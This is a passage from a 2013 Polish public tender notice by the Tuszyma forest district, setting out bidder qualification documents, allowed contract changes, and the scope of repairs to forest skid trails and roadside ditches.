<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenia i dokumenty wymagane na potwierdzenie spełniania przez Wykonawców warunków udziału w postępowaniu oraz wykazanie braku podstaw do wykluczenia z postępowania.
1.	W celu wykazania braku podstaw do wykluczenia z postępowania o których mowa w art. 24 ust. 1  oraz art.  24b ust. 3 ustawy Pzp, Wykonawca winien złożyć następujące oświadczenia i dokumenty:
1.1.	Oświadczenie o braku podstaw do wykluczenia z postępowania (formularz Oświadczenia znajduje się w Rozdziale III SIWZ).
1.2.	Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp.
1.3.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.4.	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.5.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4÷8 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.6.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.7. Listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy 
z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2007r. Nr 50, Poz. 331, z późn. zm.) 
                lub informację, o tym, że Wykonawca nie należy do grupy kapitałowej o której mowa w art. 24 ust. 2 pkt 5 ustawy. (Treść informacji zawiera pkt 5 Formularza Oferty. Złożenie podpisanego Formularza Oferty potwierdza złożenie informacji o braku przynależności do grupy kapitałowej).
1.8.   Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2.	W celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, określonych w niniejszym postępowaniu, Wykonawca winien złożyć następujące oświadczenia i dokumenty:
2.1.	Oświadczenie o spełnianiu warunków udziału w postępowaniu (formularz Oświadczenia znajduje się w Rozdziale III SIWZ).
2.2.	Na potwierdzenie spełniania warunku opisanego w pkt 6.2.1. - wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, wraz z podaniem rodzaju, zakresu rzeczowego i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających czy roboty te ( tj. spełniające wymagania określone przez Zamawiającego w pkt 6.2.1. SIWZ) zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dowodami tymi są: poświadczenie lub oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w niniejszym punkcie. W przypadku braku poświadczeń Wykonawca może przedłożyć dokumenty zgodnie z § 9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. (Dz. U. z  poz. 231) tj. dokumenty potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Formularz wykazu znajduje się w Rozdziale III SIWZ - w załączniku nr 1 do Oświadczenia). 
W przypadku korzystania przez Wykonawcę na mocy art. 26 ust. 2b Ustawy z zasobów podmiotów trzecich -  ma zastosowanie pkt 6.4. SIWZ.    
2.3.	Na potwierdzenie spełniania warunku opisanego w pkt 6.2.2. - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;
Formularz wykazu znajduje się w Rozdziale III SIWZ - w załączniku nr 2 do Oświadczenia.  
W przypadku korzystania przez Wykonawcę na mocy art. 26 ust. 2b Ustawy z zasobów podmiotów trzecich -  ma zastosowanie pkt 6.4. SIWZ.
7.2.4.	Na potwierdzenie spełniania warunku opisanego w pkt 6.2.3. - Wykaz narzędzi, urządzeń technicznych dostępnych Wykonawcy robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.  Formularz wykazu znajduje się w Rozdziale III SIWZ - w załączniku nr 3 do Oświadczenia). W przypadku korzystania przez Wykonawcę na mocy art. 26 ust. 2b Ustawy z zasobów podmiotów trzecich -  ma zastosowanie pkt 6.4. SIWZ.
7.2.5.	Na potwierdzenie spełniania warunku opisanego w pkt 6.2.4. - informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek podstawowy, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy (sporządzoną w sposób umożliwiający ocenę spełniania warunku), wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli Wykonawca z uzasadnionej przyczyny nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełniania opisanego przez Zamawiającego warunku.   W przypadku korzystania przez Wykonawcę na mocy art. 26 ust. 2b Ustawy z zasobów podmiotów trzecich -  ma zastosowanie pkt 6.4. SIWZ.
2.6.	Na potwierdzenie spełniania warunku opisanego w pkt 6.2.5. - opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (przedstawioną w sposób umożliwiający ocenę spełniania warunku). W przypadku korzystania przez Wykonawcę na mocy art. 26 ust. 2b Ustawy z zasobów podmiotów trzecich -  ma zastosowanie pkt 6.4. SIWZ.
3.	Jeżeli, w przypadku Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania, dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z tym że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób lub przed notariuszem.
4.	Wartości podane w dokumentach w walutach innych niż PLN będą przeliczane w następujący sposób: 1) wartość zrealizowanych robót budowlanych - wg średniego kursu NBP z dnia podanego jako termin wykonania zamówienia ( tj. dnia zakończenia realizacji zamówienia); 2) posiadane środki finansowe lub zdolność kredytowa - wg średniego kursu NBP z dnia wystawienia dokumentu; 3) wartość posiadanego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - wg średniego kursu NBP z dnia wystawienia dokumentu.
5.	W przypadku Wykonawców wspólnie ubiegających się o zamówienie:
6.1.	dokumenty wymienione w pkt 1.1.÷1.8.- powinny być przedłożone przez każdego z Wykonawców z osobna (odrębnie);
6.2.	oświadczenie wymienione w pkt 7.2.1. - powinno być przedłożone wspólnie w imieniu wszystkich Wykonawców albo przez każdego Wykonawcę odrębnie; w tej drugiej sytuacji Zamawiający będzie uważał, że każdy z Wykonawców złożył oświadczenie dotyczące tej części warunku, za której spełnienie jest odpowiedzialny;
6.3.	dokumenty wymienione w pkt 7.2.2.÷7.2.6. - powinny zostać złożone w taki sposób, aby wykazać, że warunki udziału w postępowaniu Wykonawcy spełniają łącznie (tj. przez jednego lub kilku Wykonawców łącznie) 
7.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokument określony w pkt 7.1.1., natomiast zamiast dokumentów, o których mowa:
7.1.	w pkt 7.1.2.÷7.1.4. i 7.1.6.- składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
2)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 
3)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
7.2.	w pkt 1.5. i 1.8. - składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4÷8, 10 i 11 ustawy Pzp.
8.	Dokumenty, o których mowa w pkt 7.1. ppkt 1) i ppkt 3) oraz w pkt 7.2., powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 7.1. ppkt 2), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
9.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 7.7., zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Postanowienie pkt 7.8. stosuje się odpowiednio.
10.	W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio  kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 Ustawy dopuszcza się zmianę zawartej umowy pomiędzy Zmawiającym a Wykonawcą  w stosunku do treści oferty Wykonawcy w okolicznościach opisanych w szczególności w § 18 Istotnych postanowień umowy.
1.)	Zmiana Terminu Wykonania Umowy   
1.1) zmiany spowodowane warunkami atmosferycznymi, które spowodowały niezawinione  niemożliwe do uniknięcia przez Wykonawcę opóźnienie tj.:
a)	klęski żywiołowe mające wpływ na realizację przedmiotu zamówienia;
b)	warunki atmosferyczne odbiegające od typowych dla danej pory roku, uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób 
i sprawdzeń, dokonywanie odbiorów;
1.2.) 	zmiany spowodowane warunkami geologicznymi, archeologicznymi lub terenowymi których Wykonawca nie mógł przewidzieć w momencie sporządzania oferty przetargowej, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:
a)	niewypały i niewybuchy;
b)	wykopaliska archeologiczne;
c)	nieprzewidziane warunki geologiczne;
d)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych.
1.3.) 	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:
a)	wstrzymanie robót przez Zamawiającego nie wynikające z przyczyn leżących po stronie Wykonawcy;
1.4.)	zmiany będące następstwem działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji w szczególności eksploatatorów infrastruktury oraz właścicieli gruntów, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie w szczególności:
a)	przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma - typowych w danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji, zezwoleń, uzgodnień itp.;
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 1.1 - 1.4 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.  
2.)	Zmiana sposobu spełnienia świadczenia
2.1 	zmiany technologiczne spowodowane w szczególności następującymi okolicznościami:
a)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
b)	odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót warunki geologiczne skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych;
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 2) możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót. 
2.2)	Zmiany osobowe
a)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne  spełniające warunki określone przez Zamawiającego w specyfikacji istotnych warunków zamówienia, według polityki kadrowej Wykonawcy
Zmiana osób podanych w ofercie Wykonawcy przy pomocy których Wykonawca realizuje przedmiot umowy nie wymaga aneksu do umowy. Zmiana jest możliwa na osoby spełniające wymogi SIWZ, a dla skutecznej zmiany niezbędne jest uzyskanie uprzedniej zgody Zamawiającego na zaproponowaną osobę.
3.)	Pozostałe zmiany spowodowane następującymi okolicznościami:
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b)	zmiana obowiązującej stawki VAT;  
c)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy; Strony ustalają, że dopuszczają zmniejszenie zakresu zadań do wykonania, a zmniejszenie wynagrodzenia będzie obliczone w oparciu o ceny jednostkowe zawarte w kosztorysie, o którym mowa w pkt 19.1.5 SIWZ i stanowiącym Załącznik nr 3 do umowy z uwzględnieniem ilości rzeczywiście wykonanych prac. 
d)	zmiany uzasadnione okolicznościami o których mowa w art. 3571 Kodeksu cywilnego; 
e)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_tuszyma/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Tuszyma; 39-321 Tuszyma 147..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2013 godzina 09:30, miejsce: Nadleśnictwo Tuszyma; 39-321 Tuszyma 147 -Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont szlaków zrywkowych na terenie Nadleśnictwa Tuszyma..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie prac związanych z remontem szlaków zrywkowych 
w Leśnictwach Nadleśnictwa polegających na:

1. Leśnictwo Przecław - oddz. 90f
- wykonanie przepustu  O 60 cm długości 12m  z rur PCV D600 SN8 -  ( wykonanie wykopu pod przepust, wykonanie podłoża z materiałów sypkich-kruszywa łamanego gr. 20cm (12*1) , ułożenie rur PCV o SN8, zasypanie wykopu z zagęszczeniem mechanicznym ubijakami, wykonanie podbudowy- warstwy dolnej z kruszyw łamanych gr. 20 cm (12*(1,0+2*0,7), wykonanie ścianek czołowych 
z darniny przy  wykonanym  przepuście,
 -  wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym  
o uziarnieniu 31,5/63 na powierzchni   400m2 i  grubości 15cm (400*0,15).
2. Leśnictwo Goleszów  - oddz. 85l, 85b, 
 - wykonanie przepustów O 60 cm długości  6m  z rur PCV D600 SN8 - szt. 2 ( wykonanie wykopów pod przepusty, wykonanie podłoża z materiałów sypkich-kruszywa łamanego gr. 20cm (6*1)*2 , ułożenie rur PCV o SN8, zasypanie wykopów z zagęszczeniem mechanicznym ubijakami, wykonanie podbudowy- warstwy dolnej z kruszyw łamanych gr. 20 cm ( 6*(1,0+2*0,7)*2, wykonanie ścianek czołowych z darniny przy wykonanych przepustach
- oddz. 85l, 85b,, 73c, 51b - wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym  o uziarnieniu 31,5/63 na powierzchni   400m2  i  grubości 15cm (400*0,15).

3.Leśnictwo Piątkowiec - oddz.11, 14,  21, 40
- wykonanie przepustów O 60 cm długości  6m  z rur PCV D600 SN8 - szt. 4 ( wykonanie wykopów pod przepusty, wykonanie podłoża z materiałów sypkich-kruszywa łamanego gr. 20cm (6*1)*4 , ułożenie rur PCV o SN8, zasypanie wykopów z zagęszczeniem mechanicznym ubijakami, wykonanie podbudowy- warstwy dolnej z kruszyw łamanych gr. 20 cm ( 6*(1,0+2*0,7)*4, wykonanie ścianek czołowych z darniny przy wykonanych przepustach,
- wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym  
o uziarnieniu 31,5/63 na powierzchni  510m2  i  grubości 15cm (510*0,15)
- odtworzenie rowów odwadniających o wymiarach szer. górą 180 cm, szer. dna 50 cm, głębokości 100cm na  długości 250 m .

4. Leśnictwo Wojsław - oddz. 37
 - wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym
 o uziarnieniu 31,5/63 na długości 500m (1500m2) ) i  grubości 15cm (500*3*0,15).

5. Leśnictwo Ruda -  oddz. 127c, 137f, 164
- wykonanie przepustów O 60 cm długości  8 i 5m  z rur PCV D600 SN8 - szt. 2 ( wykonanie wykopów pod przepusty, wykonanie podłoża z materiałów sypkich-kruszywa łamanego gr. 20cm (8+5*1) , ułożenie rur PCV o SN8, zasypanie wykopów z zagęszczeniem mechanicznym ubijakami, wykonanie podbudowy- warstwy dolnej z kruszyw łamanych gr. 20 cm ( 8+5*(1,0+2*0,7), wykonanie ścianek czołowych z darniny przy wykonanych przepustach,
- wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym  o uziarnieniu 31,5/63 na powierzchni  1050m2 i  grubości 15cm (1050*0,15)

6. Leśnictwo Sokole -  oddz. 218
- wykonanie przepustu  O 60 cm długości 6m  z rur PCV D600 SN8 -  ( wykonanie wykopu pod przepust, wykonanie podłoża z materiałów sypkich-kruszywa łamanego gr. 20cm (6*1) , ułożenie rur PCV o SN8, zasypanie wykopu z zagęszczeniem mechanicznym ubijakami, wykonanie podbudowy- warstwy dolnej z kruszyw łamanych gr. 20 cm (6*(1,0+2*0,7), wykonanie ścianek czołowych z darniny przy wykonanych przepustach,
- wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym  o uziarnieniu 31,5/63 na powierzchni  900m2 i  grubości 15cm (900*0,15).

7. Leśnictwo Niwiska - oddz. 225
- wykonanie przepustu  O 60 cm długości 6m  z rur PCV D600 SN8 - szt. 2  -  ( wykonanie wykopu pod przepust, wykonanie podłoża z materiałów sypkich-kruszywa łamanego gr. 20cm (6+6*1) , ułożenie rur PCV o SN8, zasypanie wykopu z zagęszczeniem mechanicznym ubijakami, wykonanie podbudowy- warstwy dolnej z kruszyw łamanych gr. 20 cm (6+6*(1,0+2*0,7), wykonanie ścianek czołowych z darniny przy wykonanych przepustach,
-  wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym  o uziarnieniu 31,5/63 na powierzchni 600m2  i  grubości 15cm (600*0,15)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 92.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odmulenie rowów przydrożnych dróg leśnych po ulewnych deszczach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie odmulenia i naprawy rowów, odtworzenie nasypów i poboczy dróg leśnych, udrożnienie i odmulenie przepustów wraz z uzupełnieniem wyrw materiałem pozyskanym z odmulenia, a w razie jego braku materiałem dowiezionym. Zakres prac obejmuje:
- Mechaniczne oczyszczenie rowów koparką z wyprofilowaniem dna i skarp z namułu o śr. gr. 20 cm z nadaniem rowom spadków, wbudowaniem gruntu w wyerodowane pobocza, zagęszczeniem poboczy, a nadmiar gruntu rozplantować za przeciwskarpą ( przyjęto 40% uszkodzenia rowów)
- Ręczne formowanie nasypów z gruntu kat. I-II ułożonego wzdłuż nasypu (grunt z odmulenia rowów) - zasypanie wyrw w skarpie rowów i poboczy (przyjęto 20% uszkodzenia)
Zagęszczenie zasypów z gruntu sypkiego kat I-II ubijakami mechanicznymi - współczynnik zagęszczenia Js=0,96
- Uzupełnienie nasypów i odmulenie rowu w obrębie przepustu, odmulenie i udrożnienie rur przepustu, uzupełnienie i zagęszczenie warstwy podbudowy korony drogi o grubości 0,20 m na szerokości przepustu tłuczniem o uziarnieniu 0,4-63 mm w miejscach powstałych wyrw. 
Obmiar robót dotyczy 1mb rowu wraz z poboczem i przeciwskarpą po jednej stronie drogi, wraz z istniejącymi na drodze przepustami i zjazdami. 
Przewidywany rozmiar prac wynosi 120 000 mb rowów. 
